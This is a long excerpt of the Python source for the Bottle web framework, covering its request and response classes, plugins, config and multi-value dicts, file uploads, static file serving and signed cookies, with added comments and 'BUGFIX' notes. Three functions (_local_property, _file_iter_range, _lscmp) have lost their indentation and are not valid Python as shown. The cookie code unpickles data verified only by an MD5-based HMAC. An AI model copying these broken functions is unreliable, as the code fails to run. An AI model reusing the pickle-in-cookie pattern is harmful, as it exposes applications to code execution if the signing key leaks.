    def delete_cookie(self, key, **kwargs):
        ''' Delete a cookie. Be sure to use the same `domain` and `path`
            settings as used to create the cookie. '''
        # An expired cookie with an empty value makes clients drop it.
        kwargs['max_age'] = -1
        kwargs['expires'] = 0
        self.set_cookie(key, '', **kwargs)

    def __repr__(self):
        out = ''
        for name, value in self.headerlist:
            out += '%s: %s\n' % (name.title(), value.strip())
        return out
def _local_property():
ls = threading.local()
def fget(self):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(self, value): ls.var = value
def fdel(self): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
    ''' A thread-local subclass of :class:`BaseRequest` with a different
        set of attributes for each thread. There is usually only one global
        instance of this class (:data:`request`). If accessed during a
        request/response cycle, this instance always refers to the *current*
        request (even on a multithreaded server). '''
    #: Re-binding to a new environ re-initializes the request in place.
    bind = BaseRequest.__init__
    #: The environ itself lives in thread-local storage.
    environ = _local_property()
class LocalResponse(BaseResponse):
    ''' A thread-local subclass of :class:`BaseResponse` with a different
        set of attributes for each thread. There is usually only one global
        instance of this class (:data:`response`). Its attributes are used
        to build the HTTP response at the end of the request/response cycle.
    '''
    #: Re-binding re-initializes the response for a new cycle.
    bind = BaseResponse.__init__
    # Every piece of mutable response state is stored thread-locally.
    _status_line = _local_property()
    _status_code = _local_property()
    _cookies = _local_property()
    _headers = _local_property()
    body = _local_property()
#: Short aliases for the base classes (kept, presumably for backwards
#: compatibility with code importing ``Request``/``Response`` directly).
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
    ''' A response that is also an exception, so handlers can ``raise`` it. '''
    def __init__(self, body='', status=None, headers=None, **more_headers):
        super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
    def apply(self, response):
        # Copy the complete response state onto another response object
        # (typically the thread-local one).
        response._status_code = self._status_code
        response._status_line = self._status_line
        response._headers = self._headers
        response._cookies = self._cookies
        response.body = self.body
class HTTPError(HTTPResponse):
    ''' An :class:`HTTPResponse` representing an error, optionally carrying
        the causing exception and its traceback. '''
    # Errors default to 500 Internal Server Error.
    default_status = 500
    def __init__(self, status=None, body=None, exception=None, traceback=None,
                 **options):
        self.exception = exception
        self.traceback = traceback
        super(HTTPError, self).__init__(body, status, **options)
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass  # Base error type for plugin-related failures.
class JSONPlugin(object):
    ''' Plugin that serializes dict return values (or HTTPResponse bodies that
        are dicts) to JSON and sets the Content-Type accordingly. All other
        return values pass through unchanged. '''
    name = 'json'
    api = 2

    def __init__(self, json_dumps=json_dumps):
        self.json_dumps = json_dumps

    def apply(self, callback, route):
        dumps = self.json_dumps
        if not dumps: return callback
        def wrapper(*a, **ka):
            try:
                rv = callback(*a, **ka)
            except HTTPError:
                rv = _e()
            if isinstance(rv, dict):
                #Attempt to serialize, raises exception on failure
                json_response = dumps(rv)
                #Set content type only if serialization succesful
                response.content_type = 'application/json'
                return json_response
            elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
                rv.body = dumps(rv.body)
                rv.content_type = 'application/json'
            # BUGFIX: the original returned rv only inside the elif branch, so
            # non-dict results (strings, iterables, plain responses) were
            # silently replaced by None. They must pass through unchanged.
            return rv
        return wrapper
class TemplatePlugin(object):
    ''' This plugin applies the :func:`view` decorator to all routes with a
        `template` config parameter. If the parameter is a tuple, the second
        element must be a dict with additional options (e.g. `template_engine`)
        or default variables for the template. '''
    name = 'template'
    api = 2
    def apply(self, callback, route):
        conf = route.config.get('template')
        if isinstance(conf, (tuple, list)) and len(conf) == 2:
            # (template_name, options_dict) form
            return view(conf[0], **conf[1])(callback)
        elif isinstance(conf, str):
            return view(conf)(callback)
        else:
            # No template configured: leave the callback untouched.
            return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
    def __init__(self, name, impmask):
        ''' Create a virtual package that redirects imports (see PEP 302). '''
        self.name = name
        self.impmask = impmask
        # Create (or reuse) the virtual package module and register this
        # instance as a meta-path import hook.
        self.module = sys.modules.setdefault(name, imp.new_module(name))
        self.module.__dict__.update({'__file__': __file__, '__path__': [],
                                    '__all__': [], '__loader__': self})
        sys.meta_path.append(self)
    def find_module(self, fullname, path=None):
        # Only claim submodules of the virtual package.
        if '.' not in fullname: return
        packname, modname = fullname.rsplit('.', 1)
        if packname != self.name: return
        return self
    def load_module(self, fullname):
        if fullname in sys.modules: return sys.modules[fullname]
        packname, modname = fullname.rsplit('.', 1)
        # Import the real module and alias it under the virtual name.
        realname = self.impmask % modname
        __import__(realname)
        module = sys.modules[fullname] = sys.modules[realname]
        setattr(self.module, modname, module)
        module.__loader__ = self
        return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
    """ This dict stores multiple values per key, but behaves exactly like a
        normal dict in that it returns only the newest value for any given key.
        There are special methods available to access the full list of values.
    """
    # Internally every key maps to a list of values; the last list element
    # is the "current" value returned by normal dict access.
    def __init__(self, *a, **k):
        self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
    def __len__(self): return len(self.dict)
    def __iter__(self): return iter(self.dict)
    def __contains__(self, key): return key in self.dict
    def __delitem__(self, key): del self.dict[key]
    def __getitem__(self, key): return self.dict[key][-1]
    def __setitem__(self, key, value): self.append(key, value)
    def keys(self): return self.dict.keys()
    # Python 3 exposes lazy views; Python 2 keeps list-returning methods
    # plus the classic iter* variants.
    if py3k:
        def values(self): return (v[-1] for v in self.dict.values())
        def items(self): return ((k, v[-1]) for k, v in self.dict.items())
        def allitems(self):
            return ((k, v) for k, vl in self.dict.items() for v in vl)
        iterkeys = keys
        itervalues = values
        iteritems = items
        iterallitems = allitems
    else:
        def values(self): return [v[-1] for v in self.dict.values()]
        def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
        def iterkeys(self): return self.dict.iterkeys()
        def itervalues(self): return (v[-1] for v in self.dict.itervalues())
        def iteritems(self):
            return ((k, v[-1]) for k, v in self.dict.iteritems())
        def iterallitems(self):
            return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
        def allitems(self):
            return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
    def get(self, key, default=None, index=-1, type=None):
        ''' Return the most recent value for a key.
            :param default: The default value to be returned if the key is not
                   present or the type conversion fails.
            :param index: An index for the list of available values.
            :param type: If defined, this callable is used to cast the value
                    into a specific type. Exception are suppressed and result in
                    the default value to be returned.
        '''
        try:
            val = self.dict[key][index]
            return type(val) if type else val
        except Exception:
            # Missing key, bad index or failed conversion: fall back.
            pass
        return default
    def append(self, key, value):
        ''' Add a new value to the list of values for this key. '''
        self.dict.setdefault(key, []).append(value)
    def replace(self, key, value):
        ''' Replace the list of values with a single value. '''
        self.dict[key] = [value]
    def getall(self, key):
        ''' Return a (possibly empty) list of values for a key. '''
        return self.dict.get(key) or []
    #: Aliases for WTForms to mimic other multi-dict APIs (Django)
    getone = get
    getlist = getall
class FormsDict(MultiDict):
    ''' This :class:`MultiDict` subclass is used to store request form data.
        Additionally to the normal dict-like item access methods (which return
        unmodified data as native strings), this container also supports
        attribute-like access to its values. Attributes are automatically de-
        or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
        attributes default to an empty string. '''
    #: Encoding used for attribute values.
    input_encoding = 'utf8'
    #: If true (default), unicode strings are first encoded with `latin1`
    #: and then decoded to match :attr:`input_encoding`.
    recode_unicode = True
    def _fix(self, s, encoding=None):
        if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
            # WSGI delivers text as latin1-decoded bytes; undo and re-decode.
            return s.encode('latin1').decode(encoding or self.input_encoding)
        elif isinstance(s, bytes): # Python 2 WSGI
            return s.decode(encoding or self.input_encoding)
        else:
            return s
    def decode(self, encoding=None):
        ''' Returns a copy with all keys and values de- or recoded to match
            :attr:`input_encoding`. Some libraries (e.g. WTForms) want a
            unicode dictionary. '''
        copy = FormsDict()
        enc = copy.input_encoding = encoding or self.input_encoding
        # The copy holds already-decoded values; no second recode pass.
        copy.recode_unicode = False
        for key, value in self.allitems():
            copy.append(self._fix(key, enc), self._fix(value, enc))
        return copy
    def getunicode(self, name, default=None, encoding=None):
        ''' Return the value as a unicode string, or the default. '''
        try:
            return self._fix(self[name], encoding)
        except (UnicodeError, KeyError):
            return default
    def __getattr__(self, name, default=unicode()):
        # Without this guard, pickle generates a cryptic TypeError:
        if name.startswith('__') and name.endswith('__'):
            return super(FormsDict, self).__getattr__(name)
        return self.getunicode(name, default=default)
class HeaderDict(MultiDict):
    """ A case-insensitive version of :class:`MultiDict` that defaults to
        replace the old value instead of appending it. """
    # All keys are normalized through _hkey() (Title-Case-With-Dashes).
    def __init__(self, *a, **ka):
        self.dict = {}
        if a or ka: self.update(*a, **ka)
    def __contains__(self, key): return _hkey(key) in self.dict
    def __delitem__(self, key): del self.dict[_hkey(key)]
    def __getitem__(self, key): return self.dict[_hkey(key)][-1]
    def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)]
    def append(self, key, value):
        self.dict.setdefault(_hkey(key), []).append(str(value))
    def replace(self, key, value): self.dict[_hkey(key)] = [str(value)]
    def getall(self, key): return self.dict.get(_hkey(key)) or []
    def get(self, key, default=None, index=-1):
        return MultiDict.get(self, _hkey(key), default, index)
    def filter(self, names):
        # Remove all listed headers (case-insensitive) if present.
        for name in [_hkey(n) for n in names]:
            if name in self.dict:
                del self.dict[name]
class WSGIHeaderDict(DictMixin):
    ''' This dict-like class wraps a WSGI environ dict and provides convenient
        access to HTTP_* fields. Keys and values are native strings
        (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
        environment contains non-native string values, these are de- or encoded
        using a lossless 'latin1' character set.
        The API will remain stable even on changes to the relevant PEPs.
        Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
        that uses non-native strings.)
    '''
    #: List of keys that do not have a ``HTTP_`` prefix.
    cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
    def __init__(self, environ):
        self.environ = environ
    def _ekey(self, key):
        ''' Translate header field name to CGI/WSGI environ key. '''
        key = key.replace('-','_').upper()
        if key in self.cgikeys:
            return key
        return 'HTTP_' + key
    def raw(self, key, default=None):
        ''' Return the header value as is (may be bytes or unicode). '''
        return self.environ.get(self._ekey(key), default)
    def __getitem__(self, key):
        # Values are normalized to native strings via latin1 (lossless).
        return tonat(self.environ[self._ekey(key)], 'latin1')
    def __setitem__(self, key, value):
        raise TypeError("%s is read-only." % self.__class__)
    def __delitem__(self, key):
        raise TypeError("%s is read-only." % self.__class__)
    def __iter__(self):
        # Yield header names in Title-Case-With-Dashes form.
        for key in self.environ:
            if key[:5] == 'HTTP_':
                yield key[5:].replace('_', '-').title()
            elif key in self.cgikeys:
                yield key.replace('_', '-').title()
    def keys(self): return [x for x in self]
    def __len__(self): return len(self.keys())
    def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
    ''' A dict-like configuration storage with additional support for
        namespaces, validators, meta-data, on_change listeners and more.
    '''
    __slots__ = ('_meta', '_on_change')

    def __init__(self):
        self._meta = {}
        # Called with (key, new_value) on every change; value is None on delete.
        self._on_change = lambda name, value: None

    def load_config(self, filename):
        ''' Load values from an *.ini style config file.
            If the config file contains sections, their names are used as
            namespaces for the values within. The two special sections
            ``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
        '''
        conf = ConfigParser()
        conf.read(filename)
        for section in conf.sections():
            for key, value in conf.items(section):
                if section not in ('DEFAULT', 'bottle'):
                    key = section + '.' + key
                self[key] = value
        return self

    def load_dict(self, source, namespace=''):
        ''' Load values from a dictionary structure. Nesting can be used to
            represent namespaces.
            >>> c.load_dict({'some': {'namespace': {'key': 'value'} } })
            {'some.namespace.key': 'value'}
        '''
        for key, value in source.items():
            if isinstance(key, str):
                nskey = (namespace + '.' + key).strip('.')
                if isinstance(value, dict):
                    self.load_dict(value, namespace=nskey)
                else:
                    self[nskey] = value
            else:
                raise TypeError('Key has type %r (not a string)' % type(key))
        return self

    def update(self, *a, **ka):
        ''' If the first parameter is a string, all keys are prefixed with this
            namespace. Apart from that it works just as the usual dict.update().
            Example: ``update('some.namespace', key='value')`` '''
        prefix = ''
        if a and isinstance(a[0], str):
            prefix = a[0].strip('.') + '.'
            a = a[1:]
        for key, value in dict(*a, **ka).items():
            self[prefix+key] = value

    def setdefault(self, key, value):
        ''' Set `key` to `value` only if it is missing, then return the stored
            value — matching the :meth:`dict.setdefault` contract.
            (BUGFIX: the original returned None in both cases.) '''
        if key not in self:
            self[key] = value
        return self[key]

    def __setitem__(self, key, value):
        if not isinstance(key, str):
            raise TypeError('Key has type %r (not a string)' % type(key))
        # Apply the per-key 'filter' meta callable (identity by default).
        value = self.meta_get(key, 'filter', lambda x: x)(value)
        if key in self and self[key] is value:
            return  # no change, skip listener
        self._on_change(key, value)
        dict.__setitem__(self, key, value)

    def __delitem__(self, key):
        self._on_change(key, None)
        dict.__delitem__(self, key)

    def meta_get(self, key, metafield, default=None):
        ''' Return the value of a meta field for a key. '''
        return self._meta.get(key, {}).get(metafield, default)

    def meta_set(self, key, metafield, value):
        ''' Set the meta field for a key to a new value. This triggers the
            on-change handler for existing keys. '''
        self._meta.setdefault(key, {})[metafield] = value
        if key in self:
            # Re-assign so a new 'filter' is applied to the current value.
            self[key] = self[key]

    def meta_list(self, key):
        ''' Return an iterable of meta field names defined for a key. '''
        return self._meta.get(key, {}).keys()
class AppStack(list):
    """ A stack-like list. Calling the stack returns its topmost element. """

    def __call__(self):
        """ Return the current default application (top of the stack). """
        return self[-1]

    def push(self, value=None):
        """ Add a new :class:`Bottle` instance to the stack and return it.
            Anything that is not a Bottle instance is replaced by a fresh one. """
        app = value if isinstance(value, Bottle) else Bottle()
        self.append(app)
        return app
class WSGIFileWrapper(object):
    """ Wrap a file(-like) object so a WSGI server can iterate it in chunks. """

    def __init__(self, fp, buffer_size=1024 * 64):
        self.fp, self.buffer_size = fp, buffer_size
        # Re-export the common file methods of the wrapped object, if present.
        for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
            if hasattr(fp, attr):
                setattr(self, attr, getattr(fp, attr))

    def __iter__(self):
        chunk_size, read = self.buffer_size, self.read
        while True:
            chunk = read(chunk_size)
            if not chunk:
                return  # EOF
            yield chunk
class _closeiter(object):
    ''' This only exists to be able to attach a .close method to iterators that
        do not support attribute assignment (most of itertools). '''

    def __init__(self, iterator, close=None):
        self.iterator = iterator
        # makelist() normalizes None / a single callable / a list of callables.
        self.close_callbacks = makelist(close)

    def __iter__(self):
        return iter(self.iterator)

    def close(self):
        for callback in self.close_callbacks:
            callback()
class ResourceManager(object):
    ''' This class manages a list of search paths and helps to find and open
        application-bound resources (files).

        :param base: default value for :meth:`add_path` calls.
        :param opener: callable used to open resources.
        :param cachemode: controls which lookups are cached. One of 'all',
                          'found' or 'none'.
    '''

    def __init__(self, base='./', opener=open, cachemode='all'):
        # Bugfix: the original stored the builtin ``open`` here, silently
        # ignoring any custom *opener* supplied by the caller.
        self.opener = opener
        self.base = base
        self.cachemode = cachemode

        #: A list of search paths. See :meth:`add_path` for details.
        self.path = []
        #: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
        self.cache = {}

    def add_path(self, path, base=None, index=None, create=False):
        ''' Add a new path to the list of search paths. Return False if the
            path does not exist.

            :param path: The new search path. Relative paths are turned into
                an absolute and normalized form. If the path looks like a file
                (not ending in `/`), the filename is stripped off.
            :param base: Path used to absolutize relative search paths.
                Defaults to :attr:`base` which defaults to ``os.getcwd()``.
            :param index: Position within the list of search paths. Defaults
                to last index (appends to the list).
            :param create: If True, create the directory if missing.

            The `base` parameter makes it easy to reference files installed
            along with a python module or package::

                res.add_path('./resources/', __file__)
        '''
        base = os.path.abspath(os.path.dirname(base or self.base))
        path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
        path += os.sep
        if path in self.path:
            self.path.remove(path)  # re-adding a path moves it, no duplicates
        if create and not os.path.isdir(path):
            os.makedirs(path)
        if index is None:
            self.path.append(path)
        else:
            self.path.insert(index, path)
        self.cache.clear()  # resolved names may change with the new path
        return os.path.exists(path)

    def __iter__(self):
        ''' Iterate over all existing files in all registered paths. '''
        search = self.path[:]
        while search:
            path = search.pop()
            if not os.path.isdir(path): continue
            for name in os.listdir(path):
                full = os.path.join(path, name)
                if os.path.isdir(full): search.append(full)
                else: yield full

    def lookup(self, name):
        ''' Search for a resource and return an absolute file path, or `None`.

            The :attr:`path` list is searched in order. The first match is
            returned. Symlinks are followed. The result is cached to speed up
            future lookups. '''
        if name not in self.cache or DEBUG:
            for path in self.path:
                fpath = os.path.join(path, name)
                if os.path.isfile(fpath):
                    if self.cachemode in ('all', 'found'):
                        self.cache[name] = fpath
                    return fpath
            if self.cachemode == 'all':
                self.cache[name] = None  # negative results are cached too
        # Bugfix: use .get() so a miss with cachemode 'found' or 'none'
        # returns None (as documented) instead of raising KeyError.
        return self.cache.get(name)

    def open(self, name, mode='r', *args, **kwargs):
        ''' Find a resource and return a file object, or raise IOError. '''
        fname = self.lookup(name)
        if not fname: raise IOError("Resource %r not found." % name)
        return self.opener(fname, mode=mode, *args, **kwargs)
class FileUpload(object):
    """ Wrapper around a single uploaded file (one multipart/form-data part). """

    def __init__(self, fileobj, name, filename, headers=None):
        ''' Wrapper for file uploads. '''
        #: Open file(-like) object (BytesIO buffer or temporary file)
        self.file = fileobj
        #: Name of the upload form field
        self.name = name
        #: Raw filename as sent by the client (may contain unsafe characters)
        self.raw_filename = filename
        #: A :class:`HeaderDict` with additional headers (e.g. content-type)
        self.headers = HeaderDict(headers) if headers else HeaderDict()

    # Convenience accessors for the part's own headers.
    content_type = HeaderProperty('Content-Type')
    content_length = HeaderProperty('Content-Length', reader=int, default=-1)

    @cached_property
    def filename(self):
        ''' Name of the file on the client file system, but normalized to ensure
            file system compatibility (lowercase, no whitespace, no path
            separators, no unsafe characters, ASCII only). An empty filename
            is returned as 'empty'.
        '''
        from unicodedata import normalize #TODO: Module level import?
        fname = self.raw_filename
        if isinstance(fname, unicode):
            # Transliterate to ASCII; characters that cannot be mapped are dropped.
            fname = normalize('NFKD', fname).encode('ASCII', 'ignore')
            fname = fname.decode('ASCII', 'ignore')
        # Strip directory components (both unix and windows separators).
        fname = os.path.basename(fname.replace('\\', os.path.sep))
        # Whitelist safe characters, then collapse whitespace/dashes to '-'.
        fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip().lower()
        fname = re.sub(r'[-\s]+', '-', fname.strip('.').strip())
        return fname or 'empty'

    def _copy_file(self, fp, chunk_size=2**16):
        # Copy self.file to fp in chunks, restoring the read position afterwards.
        read, write, offset = self.file.read, fp.write, self.file.tell()
        while 1:
            buf = read(chunk_size)
            if not buf: break
            write(buf)
        self.file.seek(offset)

    def save(self, destination, overwrite=False, chunk_size=2**16):
        ''' Save file to disk or copy its content to an open file(-like) object.
            If *destination* is a directory, :attr:`filename` is added to the
            path. Existing files are not overwritten by default (IOError).

            :param destination: File path, directory or file(-like) object.
            :param overwrite: If True, replace existing files. (default: False)
            :param chunk_size: Bytes to read at a time. (default: 64kb)
        '''
        if isinstance(destination, basestring): # Except file-likes here
            if os.path.isdir(destination):
                destination = os.path.join(destination, self.filename)
            if not overwrite and os.path.exists(destination):
                raise IOError('File exists.')
            with open(destination, 'wb') as fp:
                self._copy_file(fp, chunk_size)
        else:
            self._copy_file(destination, chunk_size)
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
    """ Aborts execution and causes a HTTP error.

        :param code: HTTP status code (default: 500)
        :param text: error text used for the response body
    """
    raise HTTPError(code, text)
def redirect(url, code=None):
    """ Aborts execution and causes a 303 or 302 redirect, depending on
        the HTTP protocol version. """
    if not code:
        # HTTP/1.1 introduced 303 See Other; older clients get 302 Found.
        code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
    res = response.copy(cls=HTTPResponse)
    res.status = code
    res.body = ""
    # Location must be absolute; resolve relative targets against request.url.
    res.set_header('Location', urljoin(request.url, url))
    raise res
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
''' Yield chunks from a range in a file. No chunk is bigger than maxread.'''
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
    """ Open a file in a safe way and return :exc:`HTTPResponse` with status
        code 200, 305, 401 or 404. The ``Content-Type``, ``Content-Encoding``,
        ``Content-Length`` and ``Last-Modified`` headers are set if possible.
        Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
        requests.

        :param filename: Name or path of the file to send.
        :param root: Root path for file lookups. Should be an absolute directory
            path.
        :param mimetype: Defines the content-type header (default: guess from
            file extension)
        :param download: If True, ask the browser to open a `Save as...` dialog
            instead of opening the file with the associated program. You can
            specify a custom filename as a string. If not specified, the
            original filename is used (default: False).
        :param charset: The charset to use for files with a ``text/*``
            mime-type. (default: UTF-8)
    """
    root = os.path.abspath(root) + os.sep
    filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
    headers = dict()

    # Security check: the resolved path must stay inside the root directory
    # (guards against '../' path traversal).
    if not filename.startswith(root):
        return HTTPError(403, "Access denied.")
    if not os.path.exists(filename) or not os.path.isfile(filename):
        return HTTPError(404, "File does not exist.")
    if not os.access(filename, os.R_OK):
        return HTTPError(403, "You do not have permission to access this file.")

    if mimetype == 'auto':
        mimetype, encoding = mimetypes.guess_type(filename)
        if encoding: headers['Content-Encoding'] = encoding

    if mimetype:
        if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
            mimetype += '; charset=%s' % charset
        headers['Content-Type'] = mimetype

    if download:
        download = os.path.basename(filename if download == True else download)
        headers['Content-Disposition'] = 'attachment; filename="%s"' % download

    stats = os.stat(filename)
    headers['Content-Length'] = clen = stats.st_size
    lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
    headers['Last-Modified'] = lm

    # Conditional GET: answer 304 Not Modified if the client's copy is fresh.
    ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
    if ims:
        ims = parse_date(ims.split(";")[0].strip())
    if ims is not None and ims >= int(stats.st_mtime):
        headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
        return HTTPResponse(status=304, **headers)

    # HEAD requests get headers only; everything else gets the open file.
    body = '' if request.method == 'HEAD' else open(filename, 'rb')

    headers["Accept-Ranges"] = "bytes"
    ranges = request.environ.get('HTTP_RANGE')
    if 'HTTP_RANGE' in request.environ:
        ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
        if not ranges:
            return HTTPError(416, "Requested Range Not Satisfiable")
        # Only the first requested range is honored.
        offset, end = ranges[0]
        headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
        headers["Content-Length"] = str(end-offset)
        if body: body = _file_iter_range(body, offset, end-offset)
        return HTTPResponse(body, status=206, **headers)
    return HTTPResponse(body, **headers)
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
    """ Change the debug level.
    There is only one debug level supported at the moment."""
    global DEBUG
    # In debug mode, re-enable warnings that Python hides by default.
    if mode: warnings.simplefilter('default')
    DEBUG = bool(mode)
def http_date(value):
    """ Format a date/datetime, struct_time or epoch number as an RFC 1123
        date string (the format used in HTTP headers). Strings pass through
        unchanged. """
    if isinstance(value, (datedate, datetime)):
        value = value.utctimetuple()
    elif isinstance(value, (int, float)):
        value = time.gmtime(value)
    if not isinstance(value, basestring):
        value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
    return value
def parse_date(ims):
    """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
    try:
        parts = email.utils.parsedate_tz(ims)
        offset = parts[9] or 0
        # mktime() interprets the tuple as local time; subtracting the local
        # non-DST offset and the header's own offset yields UTC epoch seconds.
        return time.mktime(parts[:8] + (0,)) - offset - time.timezone
    except (TypeError, ValueError, IndexError, OverflowError):
        return None
def parse_auth(header):
    """ Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
    try:
        method, payload = header.split(None, 1)
        if method.lower() != 'basic':
            return None
        # Payload is base64("user:password"); the password may contain ':'.
        user, pwd = touni(base64.b64decode(tob(payload))).split(':', 1)
        return user, pwd
    except (KeyError, ValueError):
        return None
def parse_range_header(header, maxlen=0):
    ''' Yield (start, end) ranges parsed from a HTTP Range header. Skip
        unsatisfiable ranges. The end index is non-inclusive.'''
    if not header or not header.startswith('bytes='):
        return
    for spec in header[6:].split(','):
        if '-' not in spec:
            continue
        first, last = spec.split('-', 1)
        try:
            if not first:       # suffix range, e.g. bytes=-100 -> last 100 bytes
                begin, stop = max(0, maxlen - int(last)), maxlen
            elif not last:      # open range, e.g. bytes=100- -> offset to end
                begin, stop = int(first), maxlen
            else:               # explicit inclusive range, e.g. bytes=100-200
                begin, stop = int(first), min(int(last) + 1, maxlen)
            if 0 <= begin < stop <= maxlen:
                yield begin, stop
        except ValueError:
            pass
def _parse_qsl(qs):
    """ Parse a query string into a list of (key, value) pairs. Accepts both
        '&' and ';' as pair separators; '+' decodes to a space. """
    pairs = []
    for chunk in qs.replace(';', '&').split('&'):
        if not chunk:
            continue
        parts = chunk.split('=', 1)
        if len(parts) != 2:
            parts.append('')  # bare key without '=' gets an empty value
        key = urlunquote(parts[0].replace('+', ' '))
        value = urlunquote(parts[1].replace('+', ' '))
        pairs.append((key, value))
    return pairs
def _lscmp(a, b):
''' Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. '''
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    import hashlib  # local import: hashlib is not in this file's top-level imports
    msg = base64.b64encode(pickle.dumps(data, -1))
    # Bugfix: hmac.new() requires an explicit digestmod on Python 3.8+.
    # md5 matches the historical implicit default, so signatures stay
    # compatible with cookies produced by older versions.
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
    ''' Verify and decode an encoded string. Return an object or None.'''
    import hashlib  # local import: hashlib is not in this file's top-level imports
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        # Bugfix: hmac.new() requires an explicit digestmod on Python 3.8+.
        # md5 matches the historical implicit default, so cookies signed by
        # older versions still verify.
        expected = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
        if _lscmp(sig[1:], expected):
            # NOTE: pickle.loads only runs on data that passed HMAC
            # verification; this is safe only as long as `key` stays secret.
            return pickle.loads(base64.b64decode(msg))
    return None
def cookie_is_encoded(data):
    ''' Return True if the argument looks like a encoded cookie.'''
    # Signed cookies have the shape b'!<signature>?<payload>'.
    has_prefix = data.startswith(tob('!'))
    return bool(has_prefix and tob('?') in data)
def html_escape(string):
    ''' Escape HTML special characters ``&<>`` and quotes ``'"``. '''
    # Bugfix: the entity replacements were corrupted (e.g. '&' -> '&', a
    # no-op); restored to the proper HTML entities. '&' must be replaced
    # first so later entities are not double-escaped.
    return string.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')\
                 .replace('"', '&quot;').replace("'", '&#039;')
def html_quote(string):
    ''' Escape and quote a string to be used as an HTTP attribute.'''
    # Bugfix: the entity replacements were corrupted ('%#10;' and literal
    # CR/TAB characters); restored to the proper numeric character
    # references for newline, carriage return and tab.
    return '"%s"' % html_escape(string).replace('\n', '&#10;')\
                    .replace('\r', '&#13;').replace('\t', '&#9;')
def yieldroutes(func):
    """ Return a generator for routes that match the signature (name, args)
        of the func parameter. This may yield more than one route if the function
        takes optional keyword arguments. The output is best described by example::

            a()         -> '/a'
            b(x, y)     -> '/b/<x>/<y>'
            c(x, y=5)   -> '/c/<x>' and '/c/<x>/<y>'
            d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
    """
    path = '/' + func.__name__.replace('__', '/').lstrip('/')
    spec = getargspec(func)
    # Arguments without defaults are mandatory path segments.
    mandatory = len(spec[0]) - len(spec[3] or [])
    path += ('/<%s>' * mandatory) % tuple(spec[0][:mandatory])
    yield path
    # Each defaulted argument adds one more, longer route variant.
    for optional in spec[0][mandatory:]:
        path += '/<%s>' % optional
        yield path
def path_shift(script_name, path_info, shift=1):
    ''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.

        :return: The modified paths.
        :param script_name: The SCRIPT_NAME path.
        :param path_info: The PATH_INFO path.
        :param shift: The number of path fragments to shift. May be negative to
          change the shift direction. (default: 1)
    '''
    if shift == 0:
        return script_name, path_info
    segs_path = path_info.strip('/').split('/')
    segs_script = script_name.strip('/').split('/')
    # Splitting an empty path yields [''] -- normalize that to an empty list.
    if segs_path and not segs_path[0]: segs_path = []
    if segs_script and not segs_script[0]: segs_script = []
    if 0 < shift <= len(segs_path):
        # Move the first <shift> fragments from PATH_INFO to SCRIPT_NAME.
        segs_script = segs_script + segs_path[:shift]
        segs_path = segs_path[shift:]
    elif 0 > shift >= -len(segs_script):
        # Move the last <shift> fragments from SCRIPT_NAME to PATH_INFO.
        segs_path = segs_script[shift:] + segs_path
        segs_script = segs_script[:shift]
    else:
        side = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
        raise AssertionError("Cannot shift. Nothing left from %s" % side)
    new_script_name = '/' + '/'.join(segs_script)
    new_path_info = '/' + '/'.join(segs_path)
    # Preserve a trailing slash on PATH_INFO if there is anything left of it.
    if path_info.endswith('/') and segs_path:
        new_path_info += '/'
    return new_script_name, new_path_info
